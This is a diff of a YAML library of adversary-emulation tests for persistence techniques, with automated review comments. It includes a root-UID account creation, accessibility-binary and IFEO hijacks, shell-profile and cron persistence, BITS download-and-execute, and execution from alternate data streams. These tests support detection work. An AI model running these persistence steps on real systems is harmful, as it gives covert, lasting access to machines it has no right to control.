|
|
|
@@ -62,7 +62,7 @@ persistence:
|
|
|
|
|
- name: Add command to .bash_profile
|
|
|
|
|
description: 'Adds a command to the .bash_profile file of the current user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -75,11 +75,11 @@ persistence:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'echo "#{command_to_add}" >> ~/.bash_profile
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Add command to .bashrc
|
|
|
|
|
description: 'Adds a command to the .bashrc file of the current user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -92,7 +92,7 @@ persistence:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'echo "#{command_to_add}" >> ~/.bashrc
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1015:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -178,7 +178,7 @@ persistence:
|
|
|
|
|
description: 'Comma separated list of system binaries to which you want
|
|
|
|
|
to attach each #{attached_process}. Default: "osk.exe"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: String
|
|
|
|
|
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
|
|
|
|
|
atbroker.exe
|
|
|
|
@@ -186,7 +186,7 @@ persistence:
|
|
|
|
|
description: 'Full path to process to attach to target in #{parent_list}.
|
|
|
|
|
Default: cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: Path
|
|
|
|
|
default: C:\windows\system32\cmd.exe
|
|
|
|
|
executor:
|
|
|
|
@@ -303,7 +303,7 @@ persistence:
|
|
|
|
|
- name: Admin Account Manipulate
|
|
|
|
|
description: 'Manipulate Admin Account Name
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -522,7 +522,7 @@ persistence:
|
|
|
|
|
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
|
|
|
|
|
to be loaded into each user mode process on the system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -535,7 +535,7 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reg.exe import #{registry_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1138:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -614,11 +614,8 @@ persistence:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Application Shim Installation
|
|
|
|
|
description: |
|
|
|
|
|
To test injecting DLL into a custom application
|
|
|
|
|
you need to copy AtomicShim.dll Into C:\Tools
|
|
|
|
|
As well as Compile the custom app.
|
|
|
|
|
We believe observing the shim install is a good
|
|
|
|
|
place to start.
|
|
|
|
|
Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
|
|
|
|
|
will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
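Review bot: The rewritten description drops the earlier prerequisite that AtomicShim.dll be copied to C:\Tools and the custom application be compiled; if the shim database still references that DLL (not visible in this hunk), `sdbinst` will report "Installation of AtomicShim complete." while the injection has nothing to hook, so the prerequisite belongs in a `dependencies:` entry with a `prereq_command` / `get_prereq_command` rather than being silently removed. Also fix the typo `privelage escalation` → `privilege escalation`, and I would cut "We believe observing the shim install is a good place to start" only if the detection hint is preserved elsewhere, since that sentence is the one that tells a blue-team reader what to look for.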
|
|
|
|
@@ -636,13 +633,17 @@ persistence:
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
sdbinst.exe #{file_path}
|
|
|
|
|
sdbinst.exe -u #{file_path}
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
command: 'sdbinst.exe #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sdbinst.exe -u #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: |
|
|
|
|
|
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
|
|
|
|
|
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -655,9 +656,11 @@ persistence:
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
- name: Registry key creation and/or modification events for SDB
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
description: |
|
|
|
|
|
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
|
|
|
|
|
the registry keys that were created. These keys can also be viewed using the Registry Editor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -772,10 +775,10 @@ persistence:
|
|
|
|
|
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{local_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bitsadmin Download (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
|
|
@@ -798,10 +801,10 @@ persistence:
|
|
|
|
|
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Persist, Download, & Execute
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
|
|
|
|
@@ -949,7 +952,7 @@ persistence:
|
|
|
|
|
- name: Firefox
|
|
|
|
|
description: 'Create a file called test.wma, with the duration of 30 seconds
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- windows
|
|
|
|
@@ -1052,10 +1055,10 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'assoc #{extension_to_change}=#{target_extension_handler}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'assoc .hta=htafile
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1136:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -1128,7 +1131,7 @@ persistence:
|
|
|
|
|
- name: Create a user account on a Linux system
|
|
|
|
|
description: 'Create a user via useradd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1141,14 +1144,14 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'userdel #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a user account on a MacOS system
|
|
|
|
|
description: 'Creates a user on a MacOS system with dscl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1172,11 +1175,11 @@ persistence:
|
|
|
|
|
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
|
|
|
|
|
cleanup_command: 'dscl . -delete /Users/#{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a new user in a command prompt
|
|
|
|
|
description: 'Creates a new user in a command prompt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
|
|
|
|
|
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1193,14 +1196,14 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'net user /add "#{username}" "#{password}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'net user /del "#{username}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a new user in PowerShell
|
|
|
|
|
description: 'Creates a new user in PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
|
|
|
|
|
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1213,15 +1216,15 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'New-LocalUser -Name "#{username}" -NoPassword
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a new user in Linux with `root` UID and GID.
|
|
|
|
|
description: 'Creates a new user in Linux and adds the user to the `root` group.
|
|
|
|
|
This technique was used by adversaries during the Butter attack campaign.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1239,7 +1242,9 @@ persistence:
|
|
|
|
|
command: |
|
|
|
|
|
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
|
|
|
|
|
echo "#{password}" | passwd --stdin #{username}
|
|
|
|
|
cleanup_command: 'userdel #{username}'
|
|
|
|
|
cleanup_command: 'userdel #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
T1038:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -1413,7 +1418,7 @@ persistence:
|
|
|
|
|
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
|
|
|
|
|
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1585,7 +1590,7 @@ persistence:
|
|
|
|
|
- name: Create a hidden file in a hidden directory
|
|
|
|
|
description: 'Creates a hidden file inside a hidden directory
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -1597,11 +1602,11 @@ persistence:
|
|
|
|
|
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
|
|
|
|
|
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mac Hidden file
|
|
|
|
|
description: 'Hide a file on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -1610,42 +1615,61 @@ persistence:
|
|
|
|
|
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
|
|
|
|
|
40 00 FF FF FF FF 00 00"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows System File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as a system file using the attrib.exe
|
|
|
|
|
utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
|
|
|
|
|
and observe that the Attributes are "SA" for System and Archive.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158 > %TEMP%\T1158.txt
|
|
|
|
|
attrib.exe +s %TEMP%\T1158.txt
|
|
|
|
|
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
|
|
|
|
|
command: 'attrib.exe +s #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows Hidden File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
|
|
|
|
|
and observe that the Attributes are "SH" for System and Hidden.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158_hidden > %TEMP%\T1158_hidden.txt
|
|
|
|
|
attrib.exe +h %TEMP%\T1158_hidden.txt
|
|
|
|
|
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'attrib.exe +h #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Hidden files
|
|
|
|
|
description: 'Requires Apple Dev Tools
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
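Review bot: The `elevation_required: true` that follows `name: command_prompt` in the "Create Windows Hidden File with Attrib" test appears to replace the previous `false`; `attrib.exe +h` on a file the current user created under `%temp%` needs no administrative rights, so the new value over-states the privilege the technique requires and makes the test skip on non-elevated runners for no reason — keep `elevation_required: false`. The new description for the same test says the attributes will read `"SH" for System and Hidden`, but this executor only sets `+h`; the system test shares the same default path yet its cleanup runs `del /A:S #{file_to_modify}`, so by the time this test's `get_prereq_command` recreates the file the expected value is `H` (plus `A`), and the wording should say `"H" for Hidden`. Separately, `File Epxplorer` → `File Explorer`.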
|
|
|
|
@@ -1658,11 +1682,11 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'setfile -a V #(unknown)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Hide a Directory
|
|
|
|
|
description: 'Hide a directory on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -1673,11 +1697,11 @@ persistence:
|
|
|
|
|
chflags hidden /var/tmp/T1158_mac.txt
|
|
|
|
|
cleanup_command: 'rm /var/tmp/T1158_mac.txt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Show all hidden files
|
|
|
|
|
description: 'Show all hidden files on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -1685,52 +1709,59 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'defaults write com.apple.finder AppleShowAllFiles YES
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS command prompt
|
|
|
|
|
description: 'Create an Alternate Data Stream with the command prompt. Write
|
|
|
|
|
access is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
|
|
|
|
|
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "%temp%\\T1158_has_ads_cmd.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo normal_text >> #{file_name} >nul 2>&1'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo "Normal Text." > #{file_name}
|
|
|
|
|
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
cleanup_command: 'del #{file_name} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS PowerShell
|
|
|
|
|
description: 'Create an Alternate Data Stream with PowerShell. Write access
|
|
|
|
|
is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
|
|
|
|
|
in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "$env:TEMP\\T1158_has_ads_powershell.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
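Review bot: The new description for "Create ADS command prompt" tells the reader to run `notepad T1158_has_ads.txt:adstest.txt`, but the new `file_name` default is `%temp%\T1158_has_ads_cmd.txt`, so the verification step points at a file the test never creates; change it to `notepad %temp%\T1158_has_ads_cmd.txt:adstest.txt` (or phrase it as `#{file_name}:#{ads_filename}`). The description should also say what success looks like: the `for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i` line executes the stream contents as a command, and as written the stream holds `cmd /c echo "Shell code execution."`, so a reader should expect that string to be echoed. The second `for /f` line in the block is presumably the new form of the first (the `delims` character changed); only one should survive on the new side.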
|
|
|
|
@@ -1738,10 +1769,9 @@ persistence:
|
|
|
|
|
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
|
|
|
|
|
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
|
|
|
|
|
set-content -path . -stream #{ads_filename} -value "test3"
|
|
|
|
|
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
|
|
|
|
|
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1179:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -1871,7 +1901,7 @@ persistence:
|
|
|
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
|
|
|
description: 'Hooks functions in PowerShell to read TLS Communications
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2071,7 +2101,7 @@ persistence:
|
|
|
|
|
- name: IFEO Add Debugger
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2089,15 +2119,15 @@ persistence:
|
|
|
|
|
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: IFEO Global Flags
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2225,7 +2255,7 @@ persistence:
|
|
|
|
|
description: 'This test uses the insmod command to load a kernel module for
|
|
|
|
|
Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2242,10 +2272,10 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'insmod #{kernel_module_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rmmod #{module_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1159:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -2330,7 +2360,7 @@ persistence:
|
|
|
|
|
- name: Launch Agent
|
|
|
|
|
description: 'Create a plist and execute it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -2432,7 +2462,7 @@ persistence:
|
|
|
|
|
- name: Launch Daemon
|
|
|
|
|
description: 'Utilize LaunchDaemon to launch `Hello World`
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -2516,14 +2546,14 @@ persistence:
|
|
|
|
|
- name: Launchctl
|
|
|
|
|
description: 'Utilize launchctl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1168:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -2611,7 +2641,7 @@ persistence:
|
|
|
|
|
of the referenced file. This technique was used by numerous IoT automated
|
|
|
|
|
exploitation attacks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -2628,13 +2658,13 @@ persistence:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Cron - Add script to cron folder
|
|
|
|
|
description: 'This test adds a script to a cron folder configured to execute
|
|
|
|
|
on a schedule. This technique was used by the threat actor Rocke during the
|
|
|
|
|
exploitation of Linux web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -2651,7 +2681,7 @@ persistence:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Event Monitor Daemon Persistence
|
|
|
|
|
description: "This test adds persistence via a plist to execute via the macOS
|
|
|
|
|
Event Monitor Daemon. \n"
|
|
|
|
@@ -2753,17 +2783,16 @@ persistence:
|
|
|
|
|
identifier: T1037
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Logon Scripts
|
|
|
|
|
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
|
|
|
|
|
directory.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
|
|
|
|
|
that can be viewed in the Registry Editor.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
script_path:
|
|
|
|
|
description: Path to .bat file
|
|
|
|
|
type: String
|
|
|
|
|
default: "$env:SystemRoot\\Temp\\art.bat"
|
|
|
|
|
default: "%temp%\\art.bat"
|
|
|
|
|
script_command:
|
|
|
|
|
description: Command To Execute
|
|
|
|
|
type: String
|
|
|
|
@@ -2772,16 +2801,16 @@ persistence:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo cmd /c "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
|
|
|
|
|
echo "#{script_command}" > #{script_path}
|
